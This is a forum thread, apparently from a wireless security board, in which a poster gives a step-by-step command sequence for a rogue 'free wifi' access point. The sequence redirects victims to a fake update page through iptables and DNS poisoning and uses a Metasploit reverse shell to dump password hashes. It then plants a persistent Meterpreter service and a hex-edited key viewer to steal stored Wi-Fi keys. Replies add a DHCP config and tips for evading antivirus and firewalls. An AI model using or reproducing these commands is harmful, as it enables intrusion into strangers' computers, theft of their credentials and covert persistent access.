Page 1 of 8 123 ... LastLast
Results 1 to 10 of 80

Thread: Fake AP WEP/WPA key grab- Video and commands

  1. #1
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default Fake AP WEP/WPA key grab- Video and commands

    I have decided to create a new thread - a follow up on the bruteforce attack thread. Hopefully this will give everyone a head start and develop from here.

    PS I'm still a linux newb

    Here is the video. Apologies if its too slow, you guys might want to fast forward a few bits
    http://blip.tv/file/1486885


    Here are the commands
    http://pastebin.com/f556dd85c


    I have only struggled with the meterpreter service installer, it installs fine but I can't run the test.rb script. If anyone else has success let me know. http://www.phreedom.org/software/metsvc/


    Jobs I think need doing

    (1) get the test.rb script working
    (2) Meterpreter script to automate the uploading of wireless key viewer and meterpreter server -- on non transparency mode we have little time so it is essential that it's automated
    (3) Scripts to start stop, redirect victims


    Wireless key viewer was modified with a hex editor to bypass most av detection.
    If anyone wants it and any other files I used then I will upload them somewhere.

  2. #2
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Commands for fake ap

    dhclient wlan0 //// Connect to the internet, can be eth0



    *****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=v...oad-executable
    cd /
    cd pentest
    cd exploits
    cd framework3
    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 55555
    show options
    exploit




    modprobe tun
    airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here

    *************************
    Transparent Airbase
    *************************
    su
    ***************
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE ///////// wlan0 = route to the internet
    /etc/init.d/dhcp3-server restart // backtrack users use dhcpd
    /etc/init.d/lighttpd stop
    lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page


    ************************************************** ********************
    direct any request to apache
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
    ************************************************** ********************
    allow traffic again
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    ************************************************** ************************
    ************************************************** ************************
    ************************************************** ************************

    NON Transparent Airbase
    su
    ***************
    modprobe tun
    airbase-ng -P -C 30 -e "free wifi" wlan1 -v

    su
    ***************
    ifconfig at0 up
    ifconfig lo up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
    /etc/init.d/dhcp3-server restart
    /etc/init.d/lighttpd stop
    lighttpd -D -f '/home/hm/Desktop/http/http'

    cd / /// dnspoison available at http://dnspentest.sourceforge.net/
    cd home
    cd hm
    cd Desktop
    cd dnspoison
    java ServerKernelMain 10.0.0.1 10.0.0.1

    ************************************************** **************************


    **** Check for victims ********
    arp -n -v -i at0





    session - l
    session -i
    sysinfo
    getuid
    use priv
    hashdump


    ***download keys*****
    mkdir c:\\windows\\wkviewer4
    cd \
    cd windows
    cd wkviewer
    upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
    upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
    upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
    upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
    upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
    execute -H -f wkv.bat
    cat wkv.txt
    download wkv.txt /home/hm/Desktop/http/wkv.txt

  3. #3
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Just got done watching it, about to try it out. Great job man! This is really cool.

    EDIT: Wondering if you could post your dhcpd.conf file, or is it very different in Ubuntu?
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    here is is

    backtrack users use dhcpd -d -f -cf /etc/dhcpd.conf at0 instead of dhcp server start

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "example.com";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.20 10.0.0.50;

    }

  5. #5
    Member
    Join Date
    Sep 2008
    Posts
    306

    Default

    The hole Fake AP (transparent) story is very interesting, and i'll as well do some setups next week and then add it to my diploma thesis.

    But: sorry that i have to ask such a (noob) question:

    The victims that are probing the ESSIDs, in my knowledge they have stored the kind of encryption which belongs to the AP.
    And if i'm right, the fake AP's use no encryption? (because otherwise the clients can't connect)

    So won't there be an error message or a hint that tells the victim that's not their AP ?

    Again sry for that question, but it's swirling in my head for a few days.
    Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:

    * post your question to a forum where it's off topic
    * post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
    * cross-post to too many different newsgroups
    * post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem

  6. #6
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Very interesting, will have to try this one out myself. Thank you for the informational video and posting the commands in pastebin as well.
    -Monkeys are like nature's humans.

  7. #7
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Quote Originally Posted by terminal86 View Post
    The hole Fake AP (transparent) story is very interesting, and i'll as well do some setups next week and then add it to my diploma thesis.

    But: sorry that i have to ask such a (noob) question:

    The victims that are probing the ESSIDs, in my knowledge they have stored the kind of encryption which belongs to the AP.
    And if i'm right, the fake AP's use no encryption? (because otherwise the clients can't connect)

    So won't there be an error message or a hint that tells the victim that's not their AP ?

    Again sry for that question, but it's swirling in my head for a few days.

    as far as I kow it shouldn't matter, I don't think it will alert you. Try it out

  8. #8
    Junior Member
    Join Date
    Sep 2008
    Posts
    32

    Default

    Could Ettercap be used (in Bridging mode) to eliminate the steps/configuration required to get the IP forwarding working? Might have other benefits as well..


    -- Tom

  9. #9
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Port 53 is our best bet,

    55555 was just for testing purposes, AVG didn't detect anything,

    firewall did when it was on, and asked to allow traffic outside, in which case you would rename your exe as windows_update.exe or something similar.


    Ettercap -- i think we discussed in the other thread, No idea if it will work, what other things do you think there is a need for?

    if using for other than key grabber we could have a dns server running on and redirect queries to fake pages, but that wasn't my aim.

    This is a good starting point for most people. would like to see further developments and lots more automation

  10. #10
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    Default

    Very good job
    Thanks for sharing !

    THX BitLocker

Page 1 of 8 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •